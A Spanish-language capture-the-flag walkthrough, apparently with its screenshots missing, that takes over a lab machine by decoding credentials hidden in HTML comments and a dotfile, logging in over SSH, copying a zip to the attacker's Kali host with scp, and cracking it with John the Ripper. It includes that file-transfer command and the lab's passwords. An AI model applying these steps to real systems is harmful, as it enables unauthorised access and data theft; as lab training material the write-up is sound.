Hacemos el escaneo con nmap:

Y esta es la web:

Si vemos el código fuente vemos este comentario:

Por lo que accedemos aquí:

Y volvemos a ver otro comentario:

Y en la parte de la derecha del todo vemos unas líneas que ponen user y abajo del todo una pass:

<!-- USER .- .-.. .. -.-. . -->
<!-- PASS 53586470624778486230526c5a58426c63673d3d -->

Sacamos la contraseña con cyberchef aplicándole el filtro de magic:

Y sacamos el user de la misma forma:

alice:IwillGoDeeper

Probamos en acceder vía ssh y vemos que funciona:

Viendo archivos ocultos nos encontramos con un .bob.txt:

535746745247566c634556756233566e61413d3d

Que nos extrae lo siguiente:

IamDeepEnough

Y usando esta clave nos convertimos en el usuario bob:

Y dentro de la raíz nos encontramos con un archivo zip:

Vamos a enviarnos este archivo por scp a nuestra máquina atacante:

scp root.zip kali@192.168.0.63:/home/kali/Desktop/

Y tenemos una contraseña que tendremos que crackear usando john the ripper:

Y vemos que la contraseña es bob:

Y ya tenemos la password de root:

root:IhateMyPassword